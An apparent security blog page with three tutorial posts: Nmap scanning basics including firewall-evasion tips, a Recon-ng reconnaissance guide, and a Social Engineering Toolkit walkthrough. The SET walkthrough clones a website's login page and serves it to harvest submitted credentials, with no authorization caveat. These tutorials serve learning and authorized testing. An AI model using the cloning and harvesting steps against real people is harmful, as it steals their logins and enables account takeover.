Showing posts with label Open Source Intelligence. Show all posts
Showing posts with label Open Source Intelligence. Show all posts

Wednesday, June 7, 2017

OSINT: Nmap


Disclaimer
Do NOT preform network scans on networks without prior authorization.

Download
Nmap for Windows
Nmap for Linux

Background
This blog post is design to provide one with a basic understanding of how Nmap works and concepts to consider when performing a network scan.  

Purpose
Network Scanning is the probing of individual network systems for the purpose of obtaining vital information about it. Packet(s) are sent with various network flags set (SYN, ACK, FIN, URG, PSH) in order to solicit a response from the target system. The different response(s) are known to mean specific things are true.

Requirements
To perform a network scan the system performing the scan must have one of the following IP Address of the network to be scanned, an IP Address CDIR range, or a domain name.

Methodology
Network scanning is a balancing act between probing a system and the amount of time spent probing it. The more time you take probing an individual system for results will increases the likely hood of it crashing. Bandwidth consumption is also a consistent issue which must be monitored, as consuming too much will slow down the network for business operations. Try to limit the amount of bandwidth your scan will use by setting time out limits per system, specifying your options related to protocols and data collection. Scanning multiple systems in parallel will increase the speed of your scan.

Output
The output from Nmap is a list of scanned targets, with supplemental information on each depending on the options used. Key among that information is the “interesting ports table”. That table lists the port number and protocol, service name, and state. The state is either open, filtered, closed, or unfiltered. Open means that an application on the target machine is listening for connections/packets on that port. Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed. Closed ports have no application listening on them, though they could open up at any time. Ports are classified as unfiltered when they are responsive to Nmap's probes, but Nmap cannot determine whether they are open or closed. Nmap reports the state combinations open|filtered and closed|filtered when it cannot determine which of the two states describe a port. The port table may also include software version details when version detection has been requested. [2]

How To
Syntax:
nmap  [option] [option]... Domain/IP Address

List of Nmap Options

Common Issues
Firewalls and Systems can be configured to drop or not respond to the various network flags based on various criteria. [1]

Common Solutions
Evade Firewalls:
  • Don't Ping
  • Skip the default discovery check.
  • Limit the number of SYN packets you send at one time. [1]

Use Cases
Nmap is used for mainly two purposes Asset Management and Vulnerability Scanning.

Vulnerability Scanning
One of the uses of network scanning is for identifying vulnerabilities of individual network systems. This is done through a process called Fingerprinting in which the collection of information relating to an individual system is obtained. It is a best practice to use verbose when using the TCP fingerprinting method as to gather logging information for trouble shooting purposes.Key information from Fingerprinting is (but not limited) to:
  • Services running
  • Operating systems
  • Device type
  • OS CPE
  • OS details
  • Uptime guess
  • Network Distance
  • TCP Sequence Prediction
  • IP ID sequence generation
Asset Management
Is the process of maintaining current information on system inventory. In addition to the physical inventory the capability/usage of the system can also be cataloged. This process is similar to Vulnerability scanning with a change in focus for the resulting information. One may be more focused on an individual system's uptime or services running for the purpose of identifying a systems role in the organization's infrastructure.

For asset management scan I would scan the network in segments and if possible during off business hours. For network segmentation try to determine which systems are internet facing verses internal. For the public facing use options that identify if a system is online. For speed use an option that does not require a response from the probed system. To Identify network segments. To speed up your scan increase the number of parallel operations (host being scanned in parallel to one another).

Nmap Scripting Engine (NSE)
(Disclaimer: I do not recommend using a publicly available NSE without first reviewing the code for yourself to determine its legitimacy.)
Here is Nmap.org's official list of Nmap Scripting Engine from Cyber Security professionals and Amateurs. I recommend reviewing their code to learn how to create your own NSE.

Resources
List of websites available for scanning

Nmap 6 Cookbook: The Fat Free Guide to Network Scanning by Nicholas Marsh
  • ISBN-10: 1507781385
  • ISBN-13: 978-1507781388
Hands on Tutorials

References
1. Nmap 6 Cookbook: The Fat Free Guide to Network Scanning by Nicholas Marsh
  • ISBN-10: 1507781385
  • ISBN-13: 978-1507781388
2.  Chapter 15 Nmap Reference Guide
  • https://nmap.org/book/man.html
3. Nmap Options
Social Media
Facebook:
https://www.facebook.com/BDavisCS/

Twitter:
@BDavis_CyberSec
Posted by at 2 comments:
Labels: , ,

Friday, March 10, 2017

Social Engineering Toolkit: Credential Harvesting


Overview
The Social Engineering Toolkit (SET) is specifically designed to perform advanced attacks against the human element.[1]


Requirements
For this blog post I used the Kali Linux operating system which comes with SET pre-installed.



Instructions
Launch SET
  • Applications > Exploitation Tools > Social Engineering ToolKit
A. Loading Credential Harvesting
  1. Select: "1) Social-Engineering Attacks" by typing the number 1
  2. Select: "2) Website Attack Vectors" by typing the number 2
  3. Select: "3) Credential Harvester Attack Method" by typing the number 3
  4. Select: "3) Custom Import"  by typing the number 3


 B. Cloning A Website
  1. Open a browser (Any browser will work)
  2. Navigate to the Website Login page you wish to clone. 
  3. Navigate to the File option in your browser.
  4. Change the Name field to index.html (the name is case sensitive)
  5. Change the Save Location to /var/www/html
  6. Change Type to Web Page, Complete
  7. Save
C. Arming the Website
  1. Open a Terminal and type ifconfig
  2. Copy the inet addr: xxx.xxx.xxx.xxx
  3. Paste the inet addr into the terminal running SET
    • set: webattack > IP address for the POST back in Harvester/Tabnabbing: xxx.xxx.xxx.xxx
  4. Type the following file path:
    • /var/www/html
  5. Type the URL of the website you clone.
  6. Type "y" for yes you want to start Apache server. 
D. Testing the Website
If everything was done correctly you'll see an exact clone of the website you cloned. 
  1. Open a browser (on the same machine you used SET on)
  2. Type in your inet addr: xxx.xxx.xxx.xxx into the URL bar.
  3. Hit Enter key

Reference
1. Social Engineering Toolkit

Social Media
Facebook:
https://www.facebook.com/BDavisCS/

Twitter:
@BDavis_CyberSec
Posted by at 8 comments:
Labels: , ,

OSINT Tool: Recon-ng


How to Use Open Source Intelligence Tool RECON-NG

Overview
"Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly." [1]

Recon-ng is a tool used to perform open source intelligence on Domains and IP addresses. It allows you to find sub domains, their relative IP addresses, and perform geographical tagging, etc.


Download
Recon-ng


Syntax
[recon-ng][default] command



Help
To access the help menu type the following command:

  • help
  • example: 
    • [recon-ng][default] help 

Database
Everything this script does is to populate a database which the user creates. This script's database query, creation, and deletion syntax is similar to MySQL.

1. Creating a Database
  • To create a database type the following command:
    • workspaces add
    • example: workspaces add TableName
  • Once you create your table you'll see the following prompt:
    • [recon-ng][TableName]
    • This means your table is ready for use with any of the modules.
2.  Defining Domains
  • After you create a table you have to define a domain for all of the modules to take action on.
  • To add a domain type the following:
    • add domain 
    • [recon-ng][TableName] add domain DomainName
3. Deleting a Table
  • To delete a database type the following command:
    • workspaces delete
    • example: [recon-ng][default] workspaces delete TableName
Modules
To search for Modules follow these steps:
1. Select your table
  • [recon-ng][default] workspaces select TableName
2. Search for Modules
  • Search Syntax:
    • [recon-ng][TableName] load SearchTerm
      • Key search terms: domain, location, reports
3.  Loading a Modular
  • From the list of option you are presented with copy & paste the whole line which contains the FilePath and the ModularName.
    • example: [recon-ng][TableName] load Path&ModularName

Recommended Videos

Reference(s)
1. Tools Kali

Social Media
Facebook:
https://www.facebook.com/BDavisCS/

Twitter:
@BDavis_CyberSec
Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)